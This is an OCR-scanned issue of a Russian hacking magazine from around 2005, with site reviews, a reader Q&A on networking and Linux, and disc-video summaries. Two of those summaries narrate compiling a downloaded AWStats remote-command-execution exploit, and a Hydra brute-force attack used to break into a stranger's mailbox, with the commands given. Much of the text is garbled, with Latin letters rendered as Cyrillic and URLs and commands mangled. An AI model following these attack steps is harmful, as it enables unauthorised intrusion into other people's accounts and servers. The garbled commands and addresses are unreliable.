с 2005 г. 


Сумма 




Ф.И.О. 


Кассир 


Подпись плательщика 
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ТШПЗЕШІТѴ 
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ВСЕ О ВЗЛОМЕ СЕТЕЙ Х25 



ІІі1:ір://5ргіп1:ег.'Га1:а1.ги 



В детстве я любил с друзьями возиться в помойках, но 
не тех, где гниет недоеденный помидор или кожурка 
от банана, а в помойках техногенных - там, куда вывозят 
отслужившие автомобили, вагоны и прочую дохлую техни- 
ку и электронику (во времена СССР это добро на металл 
никто не растаскивал). Так вот, данный сайт представляет 
собой подобную «помойку». Со всех концов интернета сю- 
да скидана всевозможная инфа по Наскіпд&Сгаскіпд, 
ЗосіаІ Епдіпеегіпд, Сгуріоіоду, Ргодгатшіпд, РИгеакіпд, 
Меѣ/ѵогкіпд и многому другому. Приступай к поиску чего- 
нибудь интересного и ценного ;). 



Н а протоколе х25 работают 
такие знаменитые в хакерс- 
ком мире сети, как Зргіпі и 
Теіепеі Чего греха таить, даже 
автор этих строк в былые дни 
лазал в, скажем так, «свобод- 
ный» интернет через эти сети, 
причем ничего, кроме телефон- 
ной розетки, для этого не тре- 
бовалось. Как я это делал? Ищи 
всю необходимую информацию 
на сайте. Надо отметить, что раньше было немало хороших ресурсов по хакингу се- 
тей х25, но сейчас практически все они умерли. Скажем «спасибо» человеку под ни- 
ком Зоісііег за возрождение данной тематики. На его сайте также можно скачать е- 
гіпе под названием «ТгіаІ Ву Ріге». 

+++++++++++++++++++++++++++++++ 



Г продай свою душу 
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Н едостаток финансовых вли- 
ваний может сыграть нема- 
ловажную роль для каждого из 
нас. Можно даже сказать, что 
этот фактор почти постоянно 
играет соло в иерархии жиз- 
ненных ценностей каждого че- 
ловека. И если одним недоста- 
точно средств на покупку оче- 
редной футбольной команды 
или самолета, отдекорирован- 
ного золотом и брюликами, то 
другие с трудом наскребают на удовлетворение пищевых потребностей. Но схожи 
все люди в одном - они заняты поиском средств к существованию, в простонаро- 
дии называемых деньгами. Интересный способ решения этой проблемы предлага- 
ет сайт иенапіуоигеоиі.соп. Создатели сайта взяли на себя роль виртуального дьяво- 
ла и всего-то навсего предлагают тебе продать свою душу за вполне определен- 
ную сумму зеленых бумажек. Сам процесс покупки души представлен в виде анке- 
тирования, в процессе которого и происходит оценка стоимости «товара». Напри- 
мер, если вы потребляете фастфуд, поддерживаете терроризм или работаете на 
транснациональные компании, то цена сделки заметно снизится. После соверше- 
ния сделки специалисты ѴШѴ5 забирают душу при личной встрече с клиентом. По- 
нятно, что все это является шуткой, показывающей, что в сегодняшнем мире че- 
ловеческая душа стоит все меньше, уступая место материальным ценностям и раз- 
нообразным следствиям глобализации человечества. 





В интернете хороших сайтов, посвященных крэкингу, 
довольно мало (в зоне .ш я могу назвать лишь 
несколько) и все они очень хорошо известны. Именно по 
этой причине их никогда не будет в нашем обзоре. Но 
мало кто из крэкеров знает сайт команды Ьіѵѵ (может, из- 
за того, что он в домене .аі?). А сайт отличный! Большое 
число уникальных туториалов и руководств, написанных 
самими авторами сайта, сгасктез, инструментов и 
многого другого. Команда, наполняющая сайт, абсолютно 
интернациональна, но язык выбран английский, так что со 
всеми людьми из команды ты можешь пообщаться на 
форуме. 









П энный сайт - уникальным в своем роде архив исход- 
ников, компиляторов, ассемблеров, трансляторов, 
дизассемблеров, дебаггеров, линкеров, интерпретато- 
ров и прочего. Автор собирает их уже на протяжении 
нескольких лет! Предпочтение, как он сам пишет на сво- 
ем сайте, отдается в основном процедурным языкам 
вроде Паскаля, Си, а также их гибридам под платформы 
005/ѴѴіп32. Списки архивов удобно рассортированы и 
снабжены краткими аннотациями со ссылками на сайты 
разработчиков (если они есть). Интересен также раздел 
с линками на родственные сайты. В закладки! И баста! 




КИН-ДЗП-ДЗП! 
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аверняка все видели замечательный фильм, повест- 
вующий о похождениях простых советских граждан 
по просторам необъятной Вселенной. А кто и не видел, 
тому, безусловно, будет небезынтересно узнать, о чем 
фильм, и загладить свою вину, погрузившись в мир па- 
цаков и чатлан. Слова «ку» и «кю» давно стали крылаты- 
ми, при виде малиновых штанов у каждого подсозна- 
тельно появляется желание сделать три раза «ку», а как 
выкатывать пепелац из гаража, напевая себе под нос 
«Мама, мама, что я буду делать», знает практически лю- 
бой школьник. Сайт посвящен этому замечательному 
фильму. Его автор, ярый поклонник «Кин-дза-дзы», вы- 
держал стилистику картины и собрал всю мыслимую и 
немыслимую инфу. Ресурс существует уже довольно 
давно, но популярен и по сей день. 






Н едавно наткнулся на инте- 
ресный сайт, представля- 
ющий собой виртуальный му- 
зей великого комбинатора и 
сына турецкоподданного Ос- 
тапа-Сулеймана-Берта-Ма- 
рия- Бендер- Бея. На сайте 
выложены нетленные произ- 
ведения Ильфа и Петрова «12 
стульев» и «Золотой теленок». 

Здесь же ты найдешь жизнео- 
писание литературных отцов 
товарища Бендера и историю 

создания романов. Рассказано об актерах, когда-либо игравших роль Бендера в кинош- 
ных экранизациях, а грезы о Рио-де-Жанейро для всех страждущих представлены от- 
дельной главой, ознакомиться с которой можно, кликнув по соответствующей ссылке. 

+++++++++++++++++++++++++++++++ 




ИНТЕРНЕТ-УНИВЕРСИТЕТ 



Іыыы-іпіиіЪ.ги 






++++++++++++++++++++++ 



Х очешь пройти учебную прог- 
рамму университета инфор- 
мационных технологий, не вы- 
ходя из дома? Сейчас это воз- 
можно! На сайте предоставля- 
ется большой выбор курсов для 
изучения, на мой взгляд, до- 
вольно интересных, например 
«Программирование в стандар- 
те Р05ІХ» или «Протоколы безо- 
пасного сетевого взаимодействия». Здесь же можно купить книги по каждому курсу 
или СР с любым комплектом курсов. Авторами курсов являются авторитетные рос- 
сийские ученые. В конце обучения выдается диплом или сертификат - в зависимос- 
ти от типа обучения, платного или бесплатного. 




ППРЕПЬСКИЕ РОЗЫГРЫШИ 



Іыши-Іаргі! -г и 
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І а дворе весенний месяц апрель. Хоть 
первое число - день всеобщих 
розыгрышей и веселья - кануло в лету до 
следующего года, но это не повод 
расстраиваться. Сайт первоапрельских 
розыгрышей ІаргіІ.ги предлагает тебе 
продлить праздник и продолжить глумление 
над окружающими. Не правда ли, пора 
сменить стандартные фразы типа «Ой! А у 
вас, дяденька, ус отклеился =)» на что- 
нибудь более свежее и прикольное? Если ты тоже призадумался над этим вопросом и 
ищешь подходящий ресурс для пополнения своей базы перлов - сайт поможет тебе в 
этом. Также ресурс ведет прием приколов у населения и размещает их на своих 
страницах, а лучшему, как и положено, торжественно присуждают приз и звание 
почетного перлосдатчика месяца. 








I 





ѴЦ7 Намедни поставил Ресіога Соге 2 на свою ѴМѵѵаге последней версии. 

Проблемы начались с самого начала. Эта связка ни в какую не хочет 
дружить с Х-ѴѴіпсІоѵѵз. Пробовал запускать и КОЕ, и Споте - одна и 
та же фигня. Не запускается, и все тут. 

(Т) 

На самом деле похожая проблема возникает еще и на ѴігіиаІ РС. 
Причина заключается в том, что по умолчанию выставленная в конфи- 
гах глубина цвета равна 16 битам. Виртуальные машины такое положение дел 
не признают и настаивают на том, чтобы она была никак не меньше 24. 
Собственно, выход из этой ситуации один: изменить ее значение. Так что сме- 
ло логинься в консоли под рутом и запускай какой-нибудь текстовый редак- 
тор, например стандартный ѵі. С его помощью нужно открыть конфигурацион- 
ный файл Х-Зегѵег’а /е1с/Х11/хогд.соп{, после чего найти в нем секцию 
[Зсгееп] и параметр ОеШШерШ. Далее изменяй его значение с 16 на 24, сох- 
раняй изменения и уходи в ребут (виртуальной машины, естественно). Все. 



Сейчас многие файловые хранилища разрешают доступ к своим ре- 
сурсам только для своих, то есть для тех клиентов, которые имеют 
российские ІР-адреса. Я живу в СНГ (как вариант: диапазон ІР’шни- 
ков провайдера занесен в черный список), и меня, соответственно, 
туда не пускают :(. Как можно это исправить? 

Вполне логичное решение - изменить ІР-адрес так, чтобы он боль- 
ше не попадал в черный список. Для этого можно, например, поменять 
провайдера :). Хотя, конечно, на такие радикальные меры идти совершенно не 
обязательно. Самым идеальным вариантом, на мой взгляд, является исполь- 
зование российского прокси-сервера - просто и со вкусом. Найти хороший, 
быстрый и стабильный проксик довольно сложно, хотя, естественно, можно. 
Для этого я тебе рекомендую купить доступ к специальном сервису, который 
предоставляет список качественных экземпляров (подробнее читай в фев- 
ральском номере X). Если же желания лишний раз тратиться нет, то можно 
проштудировать открытые списки на ѵѵѵѵѵѵ.аІіѵергоху.соп/ги-ргоху-Іі$і. Второй спо- 
соб - воспользоваться услугами так называемых анонимайзеров. Типичный 
представитель - шѵшопуітшег.ш. Подробно рассказывать о них не вижу смыс- 
ла, так как на самих сайтах все подробно расписано. 



ф Задавая вопрос, подумай! Не стоит мне посыпать 
вопросы, так ипи иначе связанные с 
хаком/кряком/фриком, - для этого есть ІіасИац 
(ІіаскІадігеаІ.хакер.ш), не стоит также задавать 
откровенно ламерские вопросы, ответ на которые ты 
при определенном желании можешь найти и сам. Я 
не телепат, поэтому конкретизируй вопрос, 
присыпай как можно больше информации. 



Устанавливать модуль РегГа довольно геморройно. Я слышал, что этот 
процесс можно как-то автоматизировать. Подскажи, пожалуйста, как? 



Язык РегІ получил широкое распространение за счет огромного количе- 
ства подключаемых модулей, разработанных сторонними девелоперами. 
Примечательно, что все эти модули четко рассортированы по назначению и доступ- 
ны на специальном ресурсе СРАМ (шѵѵ.регІ.сот/СРАІ^СРАІІІіІтІ). Все эти модули, 
конечно же, можно скачивать и устанавливать вручную, но как раз для облег- 
чения этого процесса в самом РегІ’е встроена специальная оболочка. Ее запуск 
осуществляется следующим образом: 



# регІ -МСРАИ -е зііеіі 



Во время первого запуска тебе придется указать несколько важных настроек, ко- 
торые необходимы для корректной работы. Ничего сложного там нет, практичес- 
ки все можно оставить по умолчанию. Как только этот процесс будет закончен, ты 
получишь доступ к консоли, в которой можно вводить команды. Для установки 
конкретного модуля используется следующая конструкция: срап> іпгіаіі <имя_мо- 
дуляХ А для поиска подходящего под твои требования модуля используется ко- 
манда срап> і /<текст>/. С ее помощью ты найдешь все модули, в названии ко- 
торых присутствует слово «текст». Более подробную информацию ищи в специа- 
лизированной статье - ѵѵш.ргоѵі(1ег2.ги/агіісІе$/регІ/срап-по(1иІе$-іп$(аІІ.Іі(пІ. 



ѴЦу Помоги! У нас есть небольшая (~50 компов) локалка. Простенькая, без 
сложных маршрутизаторов: одни компьютеры и дешевые свитчи. Не- 
давно столкнулись с любителями сниферов. У нескольких человек уже 
увели аськи, пароли к другим сервисам и т.д. Все из-за этого дурац- 
кого АВР-спуфинга. Можно ли как-нибудь с ним бороться? 

Г) 

Пресечь деятельность программ-сниферов, которые используют 
прием АВР-спуфинга, не очень сложно. Принцип их действия основан 
на атаке Мап-Іп-МісІсІІе, для которой они активно посылают в сеть целую кучу 
ложных АРР-пакетов с подменой МАС-адреса. Прием весьма действенный, но 
стоит зафиксировать свою АРР-таблицу, то есть для каждого ІР-адреса в сети 
задать статический МАС-адрес, - и сниферам останется только нервно курить 
в сторонке. Задача хоть и простая, но весьма трудоемкая. Для каждого компь- 
ютера в сети нужно набрать команду агр -з <ІР-адрес> <МАС-адрес>. 
Желающие могут также попробовать отловить беспредельщиков. В этом нелег- 
ком деле им помогут утилиты агрѵѵаісіп (шѵѵ-пгд.ее.ІЫ.доѵ) и гетоіе агрѵѵаісіп 
(шішссооп.кіеѵ.иа/ргоіесЫгетагр), которые путем мониторинга изменений в 
АРР-таблице обнаруживают подозрительные АРР-пакеты и информируют о них 
администратора. Неоценимым подспорьем также является утилита АпйЗпіТС 
(шѵѵ.І 0 рІ 1 сот/апІі$піі() от легендарной команды ІОрІіІ 






Чем отличаются 
сетевых карт? 



полудуплексный и полнодуплексный режимы у 



Если ты хоть раз работал с рацией, то понятие полудуплексного режи- 
ма должно быть тебе знакомо. Вспомни: для того чтобы передать что-то 
по рации, тебе всегда приходится нажимать на специальную кнопку. То есть тебя 
слышно только тогда, когда эта кнопка нажата, и наоборот, отпуская кнопку, ты 
можешь слушать своего напарника. Это и называется режимом полудуплекса. 

В сетевых устройствах (это касается не только сетевых карт, но и свитчей, ап- 
паратных маршрутизаторов и т.п.) все аналогично. Когда сетевой адаптер ра- 
ботает в полудуплексном режиме, прием и отправка кадров данных не могут 
осуществляться одновременно. По крайней мере, в крохотный момент време- 
ни. Это абсолютно не значит, что в таком режиме данные могут идти только в 
одну сторону. Конечно же, нет! На самом деле такой принцип вполне приго- 
ден и отслужил уже немало лет: для этого сетевые устройства используют 
специальные алгоритмы чередования процессов приема и отправки данных, 
обеспечивая таким образом передачу в обоих направлениях. 

В полнодуплексном режиме, который в последнее время стал стандартом де- 
факто, как прием, так и передача могут осуществляться одновременно. Это, 
естественно, значительно увеличивает производительность сети. 



ѴЦу Я затеял большой апгрейд компьютера. Хочу купить все по полной 
программе, в том числе и новый процессор. Все друзья, чуть ли не 
перебивая друг друга, кричат о 64-битных процессорах. А я сомне- 
ваюсь. Будет ли в них толк? Издавна с недоверием отношусь к про- 
дукции АМР. 

(п) 

Важно понять, что ощутить все преимущества 64-разрядных процес- 
соров можно лишь вкупе с соответствующим программным обеспечени- 
ем. А такового, увы, пока еще весьма мало. Да, МісгозоЙ уже выпустила бета- 
версию ОС для 64-битных процов - ѴѴіпсІоѵѵз ХР 64 Вй ЕбШоп, но какой от нее 
толк, если большинство программ по-прежнему 32-битные? Да, кое-где можно 
выжать 20-30% прироста производительности, например при кодировании 
фильмов или шифровании/дешифровании информации. Однако это касается 
лишь крайне редких 64-битных приложений, в то время как большинство при- 
вычных для нас программ работают на модных процессорах ничуть не быстрее. 
С другой стороны, неизвестно, что будет через год или два. Возможно, уже 
скоро 32-битные приложения уйдут в историю, как когда-то ушли их 16-бит- 
ные собратья. Об этом стоит задуматься. 

Что касается твоей нелюбви к АІѴЮ, то могу посоветовать тебе немного пов- 
ременить с апгрейдом. Дело в том, что компания Іпіеі не так давно выпустила 
новые процессоры ІпіеІ Репйипл 4 ЕЕ 3,74. Новые камни имеют 2 Мб кэша І_2, 
частоту системной шины 1066 МГц и, самое главное, поддерживают техноло- 
гии ЕМ64Т, то есть 64-разрядные вычисления. В продаже их еще нет, однако 
производительность Іпіеі и АМР сравнивают уже сейчас. Хороший обзор вы- 
ложен на шѵѵ.(сепіег.ги/опІіпе.$МпІ?агіісІе$/!іаг(1ѵѵаге/ргосе$$ог$/11868. 



I У I Как отослать 5М5 с некоторой задержкой? Другими словами, сделать 
так, чтобы отосланное сообщение дошло до получателя, скажем, 
через час или два. 

( Я } 

Действительно, некоторые операторы сотовой связи поддерживают та- 
кую возможность. Услуга, как ни удивительно, называется 5М5 с задерж- 
кой (5М5 ѵѵіІГі а беіау). Для ее использования необходимо в начале СМС вставить 
специальную команду - *ЭЕР И# (где N - количество часов, на которое нужно за- 
держать сообщение), а потом через пробел ввести основной текст сообщения. 



Есть сайт ѵѵш.зііе.сот. Если перейти по этому адресу, то сервер вер- 
нет ошибку 404, сославшись на то, что такой страницы не существу- 
ет. Но если заходить по адресу шѵѵ.зіІе.сот/іпсІех.МтІ, то все ОК. Объ- 
ясни этот феномен, я что-то никак не понимаю. 



Ничего удивительного в этом нет. Стартовой страницей сервера яв- 
ляется файл іпбех.МплІ, но веб-сервер, по всей видимости, не воспри- 
нимает его как таковую. Объясняю, как исправить этот баг, на примере 
АрасГіе. В корневой папке веб-контента необходимо создать файл .Массезз 
(если такового еще нет) и добавить туда одну строчку: 



ОігесіогуМех іікІеШтІ. 



Если ты владеешь администраторскими правами к серверу, то же самое мож- 
но прописать еще и в ІШрсІ.сопГ В этом случае настройка будет по умолчанию 
распространяться сразу на все виртуальные серверы. 



Огромное спасибо за то, что на своих Р\Ю вы выкладываете І_іѵеСО- 
версии различных Шпих’ов - это реально помогает новичкам. Я, к 
примеру, уже вполне прилично освоился с Кпорріх’ом, и сейчас даже 
отпала всякая необходимость постоянно загружать его с СР. Возмож 
но ли установить его на жесткий диск как полноценную операцион- 
ную систему? 



Проще всего будет воспользоваться специальным скриптом кпх- 
ИсІіпзІаІІ. Алгоритм действий следующий: как обычно, загружайся с 
І_іѵеСО, дождись, пока закончится запуск иксов, и после этого запускай кон- 
соль. Далее под ругом введи команду кпх-іпсііпзіаіі. Появится окно интерактив- 
ного мастера, с помощью которого и производится установка. Проблем, в 
принципе, возникнуть не должно, но за подсказкой всегда можно обратиться 
к иллюстрированному мануалу на иѵѵѵѵѵ.5$Іид.(]к/~сІіІог/кпорріх/кпх-ЫіпзІаІІ. 





ѴЦ і Тема февральского номера - атака на ѴѴі-Рі. Любопытно, конечно, но 
ответь мне на такой вопрос: а как можно отследить несанкциониро- 
ванные подключения к моей точке доступа? Ведь есть же специаль- 
ные средства? 

Мне лично очень приглянулась утилита АігЗпаге (Шр://Ііоте.сотса$і.пеі/ 
~Іау.сІеЬоег/аіг$паге). Эта, по сути, нехитрая программа использует до- 
вольно эффективный механизм для мониторинга незаконных подключений. 
АігЗпаге ведет контроль за МАС-адресами, подключенным к АР-шке (Ассезз 
Роіпі - точка доступа) ѴѴі-Рі устройств. Если девайс имеет знакомый МАС-ад- 
рес, то есть занесен в базу данных программы, значит, клиент наш. Если же 
нет, нужно держать ухо востро, потому как велика вероятность того, что подк- 
люченное устройство используется для вардрайвинга. Программа пошлет 
оповещение администратору и тут же начнет перехватывать весь связанный с 
ним трафик с помощью снифера ЕШегеаІ. Лихо? Не то слово. Помимо этого, 
АігЗпаге постоянно отслеживает все ОНСР-запросы на получение ІР-адреса и 
подключение к сети. 



Во время прошивания БИОСа материнской платы у меня отключили 
свет. Результат плачевный: компьютер ни в какую не стартует. Что 
теперь делать? (Системная плата ЕРоХ.) 

ГГ) 

Для начала неплохо попробовать провернуть один трюк. Однако он 
актуален только тогда, когда компьютер подает хотя бы какие-нибудь 
признаки жизни, например щелкает дисководом. Если так оно и есть, то сме- 
ло ищи пустую дискету и беги к другу записывать на нее следующие файлы: 
последнюю версию прошивальщика аѵѵсІТІазИ.ехе (ѵѵѵѵѵѵ.ЛІеЬох.ги/р/аѵѵсіТІазІі), сам 
БИОС с именем файла пеѵѵЬіоз.Ьіп и плюс к этому файл аиІоехес.ЬаІ со стро- 
кой «аѵѵсКІазЬ пеѵѵЬіоз.Ьіп /зп /ру /сс /г». После этого вставляй дискету в дис- 
ковод и включай компьютер. Велика вероятность того, что все обойдется хо- 
рошо и компьютер через некоторое время загрузится как ни в чем не бывало. 
Но даже если ничего не вышло, отчаиваться не стоит. Нужно попробовать 
отыскать знакомого (или еще лучше - знакомую) с точно такой же материнс- 
кой платой. Нашел? Тогда аккуратно вытащи из своей материнки чип БИОСа 
и замени его точно таким же работающим. Если компьютер загрузился, мо- 
жешь ликовать от восторга. Единственное, что осталось сделать, - при рабо- 
тающем компьютере (бояться тут нечего, но все-таки нужно быть очень осто- 
рожным) вытащить чужой чип и вставить обратно свой, вышедший из строя. А 
дальше загружайся с уже готовой загрузочной дискеты и жди результата. 

Не исключено, что на такие действия решится далеко не каждый, поэтому, как 
вариант, можно обратиться к специалистам из сервисного центра. Или, нап- 
ример, купить новую флешку с уже прошитым БИОСом, благо дилеры ЕРоХ 
такую услугу предоставляют. Стоит отметить, что расходы при таком подходе 
будут значительно выше. 



ѴИ7 Как известно, в Х-ѴѴіпсІоѵѵз реализован полноценный аналог виндовс- 
кой корзины. Работает в моем Мапсігаке’е хорошо - спору нет. Од- 
нако в консоли я такой возможности, к сожалению, не нашел. Может 
быть, плохо искал? 

ГГ) 

В самом деле, линукс по умолчанию такой возможности не предос- 
тавляет. Команда пп или любимый новичками МібпідМ: Соплплапсіег 
(тс) для удаления файлов обращаются непосредственно к функции ядра 
ипііпк, которая стирает файл без возможности восстановления. Тем не менее, 
нашлись умельцы, которые нехитрым образом видоизменили функцию ипііпк 
и реализовали некоторое подобие корзины. Утилита называется гесусІесІ4Ііпих 
(шѵѵ.$Мгка.огд/гесусІесІ4Ііпих) и состоит из пропатченного модуля для ядра, а так- 
же оболочки для работы с корзиной. После установки программы все удаляе- 
мые файлы на самом деле будут переноситься в специальную папку, откуда 
уже потом при желании их можно удалить. Несмотря на то что программа 
имеет статус «бета», работает она вполне стабильно. Я серьезных багов не за- 
метил. Зато сразу же приметил широкие возможности для настройки квот для 
пользователей и опций для удаляемых файлов. 



ѴЦу Сейчас разрабатываю сайт для одной конторы, торгующей програм- 
мным обеспечением. Компания хранит все свои прайс-листы в фор- 
мате ЕхсеІ, а они создаются какими-то бухгалтерскими программа- 
ми. Мне предлагают настроить автоматическую закачку этого хіз- 
файла на сервер, но я хочу пойти дальше и отображать обновленный 
прайс прямо на самой веб-странице. Отсюда вопрос: каким образом 
можно средствами РНР динамически обработать лист ЕхсеГа и пре- 
образовать его в НТМЬвид? 

(Я) 

Здесь тебе не обойтись без библиотеки РН Р- ЕхсеІ Реасіег (Шр://рІірех- 
сеІгеа(1ег.$оигсе(огде.пе1). Вкратце объясню, как ее использовать: 

О Для начала подключим файл с описанием класса командой іпсІисІеСгеасІ- 
ег.ріпр'). 

О Далее создаем экземпляр класса: $хІ геасіег = пеѵѵ ЗргеасІ5Ііее1_ЕхсеІ_РеасІег( ) . 
© Указываем объекту, какой именно файл (ЛІепате.хІз) необходимо 
обработать: $хІ геасІег->геасІ("ТіІепате.хІ5"). После этого вся извлеченная 
информация будет помещена в хранилище данного объекта. 

О Контейнерами для хранения данных служат обычные двумерные массивы. 
Поэтому для доступа к ним не надо применять какие-либо специфические и 
изощренные методы и функции. Просто работай с массивом, как ты это 
делаешь по десять раз на дню. 

© Общий синтаксис команды выглядит следующим образом: $хІ геасіег- 
>зЬееВД[у], где х - это номер листа в документе, а у - одно из специальных 
свойств. 

© Например, чтобы присвоить переменной $гоѵѵз количество строк на 
первом листе (нумерация листов начинается с нуля!), достаточно 
использовать команду $гоѵѵз = $хІ_геасІег- >зІіееІ5[0] ['питРоѵѵз'] . 

О Команда для извлечения информации из первой ячейки второго листа: 
$сеІІ = $хІ_геасІег->5ІіееІ5[1][ , сеІІ5 , ][1][1]. 

® А следующая команда может быть полезна, если необходимо возвратить 
имя листа: ЗзЬееІпате = $хІ геасІег->ЬоипсІ5Іпее1:5[0] ['пате'] . 



Сделано в Студии Лебедева в 2005 году 
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О ВИДЕО: СѴСѴѴШ: 

ЕХРІ-ОІТЗ СОМРІІ.ШС 

Иногда в нашем нелегком деле бывают ситуации, когда необхо- 
димо собрать удаленный эксплойт, предназначенный для ком- 
пиляции в *І\ІІХ, не имея под руками линукс-шелла. Что же мож- 
но сделать в данном случае? Стоит воспользоваться эмулято- 
ром ІІІЧІХ’а СудѴѴіп, собрав программку в нем. Собственно го- 
воря, это и делает хакер в данном видеоролике. Сначала он 
подбирает на сайте ѴѴШ.$есіІГІ1:уІаЬ.ГІІ тестовый эксплойт, с ко- 
торым будет работать в дальнейшем. Кандидатом становится 
АѴѴЗШз 6.x ріидіптосіе Миіііріе Ретоіе Соттапб Ехесиііоп 
Ехріоіі (ѴШ.$есигІІуІаЬти/52983.11ІП1І). После этого взломщик 
берет декабрьский ][-0\Ю за 2004 год (#72) и ставит с него 
СудѴѴіп на свой компьютер. Во время инсталляции, правда, воз- 
никают небольшие проблемы - установка почему-то подвисает 
на последней стадии. Однако после пары простых манипуляций 
с клавой взломщику все-таки удается завершить начатое. Те- 
перь пора запускать судѵѵіп. Для этого достаточно всего лишь 
кликнуть по соответствующему ярлычку на рабочем столе. 

Итак, полугорагиговый монстр полностью находится в распо- 
ряжении хакера. Для начала взломщик вводит команды Із -Іа, 
«рѵѵб», «іб», «ѵѵдеі», чтобы убедиться в том, что эмулятор выдает 
на них адекватные ответы. Удостоверившись, что шелл полностью 
работоспособен, хаксор сливает исходники сплойта командой 
«ѵѵдеі №р://ѵѵѵм.5есип^ІаЬ.ш/_ЕхрІоіІ5/2005/02/зіІеАѴѴ5хрІ.с.М в 
текущую директорию, после чего переименовывает файл 
зіІеАѴѴЗхрІ.с.М в зіІеАѴѴЗхрІ.с. Затем он приступает к компиля- 
ции только что скачанной программки, набрав для этого коман- 
ду дсс зіІеАѴѴЗхрІ.с -о ту ехріоіі. В результате появляется но- 
вый бинарный файл ту ехріоіі.ехе, который, как ты уже понял, 
и является самим откомпиленным вариантом сплойта 
зіІеАѴѴЗхрІ.с. Его можно запускать как и в судѵѵіп’е, так и в голой 
винде. В последнем случае нужно не забыть скопировать файт 
судѵѵіпі .611 в папку, где лежит тело эксплойта ту_ехрІ0ІІ.ехе. 

О ВИДЕО: БРУТФОРСЕР НУРРА 

Читал статью пацанский бругфорс в январском выпуске Хакера? 
Там я описывал мега рульный брутфорсер Нубга. Эта програм- 
ма действительно стоит всеобщего внимания - при умелом ис- 
пользовании софтина превращается в нехилое оружие взлом- 
щика. Дело в том, что она может быстро подбирать пароль по 
словарю не только к почтовым ящикам по РОРЗ/ІМАР протоко- 
лу, но и к 55Н, іеіпеі, РТР, МуЗОЦ МЗ-ЗОЦ НТТР/НТТР5 Ьазіс- 
аиШ, НТТР/ЗОСКЗ ргоху, зтІр-аиШ, зтЬ. В видеоролике хаксор 
показывает, как работать с этой чудо-утилитой на примере 
взлома почтового ящика некого американского челдона. Вот что 



конкретно делает взломщик в самом видео. Сначала он скачи- 
вает гидру в свой домашний каталог, выполнив для этого ко- 
манду ѵѵдеі МПр ://Шс . огд/ге Іеазез/Муб га-4 . 6 -зге Лаг . дг . Дальше 
командой Таг ш\ Иубга-4.6-згсТаг.д2 он распаковывает архив. 
После этого сливает и разархивирует исходники библиотеки ІіЬ- 
ззМ аналогичным образом. Либа нужна для того, чтобы собрать 
гидру с поддержкой брутфорса ЗЗН-аккаунтов. После этого он 
устанавливает библиотеку стандартным способом, выполнив 
последовательно для этого "./сопйдиге", "таке", "таке іпзіаІІ", 
вслед за тем инсталит и саму гидру, выполнив те же команды. 
Далее с сайта ѴѴѴѴѴѴ.ПЗСІ.ги он стягивает словарь, содержащий по- 
тенциальные пароли от взламываемого почтового ящика. Что ж, 
теперь все готово, можно начинать бруг. Для этого стоит наб- 
рать команду Ііубга -I атакуемый логин -Р файл_с_паролями 
адрес_рорЗ-сервера рорЗ. Через некоторое время пароль все- 
таки успешно подбирается, и хакер наконец-то получает доступ 
к ящику. Как я уже говорил, аналогичным способом можно под- 
бирать пароль и к другим не менее интересным сервисам. 



О КАЗРЕРЗКѴ ШТЕКЫЕТ 
5ЕСІЖІТѴ 2006 

Программое обеспечение, предназначенное для полномасш- 
табной защиты твоего железобетонного коня в сети Интернет. 
В КІ5 2006 используется новая архитектура, на которой скоро 
будет построено большинство продуктов от лаборатории Каспе- 
рского. Программа имеет модули антивирусной защиты файло- 
вой системы, электронной почты, ѴѴеЬ, персональный межсете- 
вой экран, модуль анти-спама и еще с десяток интересных 
вещей. Совершенно новый пользователький интерфейс. Стоит 
обязательно посмотреть на эту бетку. 





у 



О РСБ5 

Отличная программа, позволяющая начисто удалить файлы с 
жесткого диска. Ведь, как ты, надеюсь, понимаешь, комбина- 
ция клавиш 5НІП+0ЕІ. вовсе не уничтожит всю информацию о 
файле, и при острой необходимости с помощью специальных 
утилит удаленное можно восстановить. Тулза очень проста в 
использовании, да к тому же на русском языке, так что даже 
начинающие пользователи РС смогут самостоятельно удалить 
компромат со своего харда :). 
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II ВАКЗІС Ѵ.11.23. 

Среда разработки и проигрыватель для языка программирования 
ВАР5ІС - нового языка для локальных компьютеров и сети. Син- 
таксис подобен паскалевскому. Программа имеет множество 
удобных средств взаимодействия с ОС. Для использования подп- 
рограмм обладает удобными средствами подключения внешних 
ДЛЛок. Поддерживается двух- трехмерная графика, ОрепСІ.. С 
программой поставляются материалы-МогіаГы. 









РАИ.У ЗОРТ 7-2ір 4.16 Веіа Есіірзе 5РК 3.0.2 РТРІпІо ѴігіиаІ СР 7.0 

Орега 8 Ьеіа 3 ѴѴіп7ір 9.0 ЗВ-1 ВЕТА ИеШеапз ІРЕ 4.1 еРопкеу2000 1.1 Ргіѵег СІеапег 3.3 

МогіІІа 1.8 Веіаі, 1.7.6 (6195) РЕСотрасІ 2.51 ѴѴеЬЗіІе ШсГіег 4.03 

МогіІІа РігеРох 1.0.2 ѴѴіпгаг 3.50 1 ѴѴіпНех 12.05 ЗВ-10 ЗІаІізІХР 9.8 МІЗС 
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ѴѴШОѴѴ5 

МШ.ТІМЕРІА 

ЗеІАисІіо ѵб.14 (Ьазіс) 
ОаІаВигпег 1.0.2.721 
ТгШоГШЖІЖѵ2Ж 
Ѵібеоіпзресіог 1.2.3.73 
ЕАЗУ Вигпіпд 1 .81 
РогсеѴізіоп 3.04 
ВеаІ АІІегпаІіѵе 1 .31 
К-Ше Сосіес Раск 2.43 
ОѴОІсІІе 5.82 Рго 
МЫРЁ6ІЖ5 
ВІіпсІѴѴгіІе 5.2.12 
МрЗІад 2.29е 

шіх 

МШТІМЕОІА 

АІІегЗІер 2.00.04 
Сгаѵетап 0.3.8 
Каііеіпе 0.6 
ВІаскВох 0.70 
ХІсе 4.2.1. 1 
КЗЬ 0.11.23 



150 Соттапсіег 1.6.020 
іиѴСВ 4.94.361 
АиІоОК 2.0 
ѴІІРІауег 2.4 
ХМРІау 3.2.0.4 
ЗоипсІРогде 8.0 

ОЕѴЕЮРМЕЫТ 

ВАВ5ІС ѵ.11.23 
ЗаѵаТВ 
ЫеШеапз ЮЕ 4.1 
РЕСотрасІ 2.50 
ѴѴіпНех 12.05 5В-10 



КРІіоІоВоок 0.0.6 

РЕѴЕ1.0РМЕІ1Т 

Мопо 1.1.5 
КШЗ 0.9.88 
ксііззеіі 0.3.8 
КОеѵеІор 3.2.0 



ыѵи о.90 всі 

ИЕТ 

Аѵапі Вгоѵѵзег ѵЮ.О (ЬиіІсі 
165) 

Зеіісо РегзопаІ РігеѵѵаІІ 
1.0.1.56 

ТѵѵеакМАЗТЕВ РВ0 2.04 
ЬиіІсі 764 

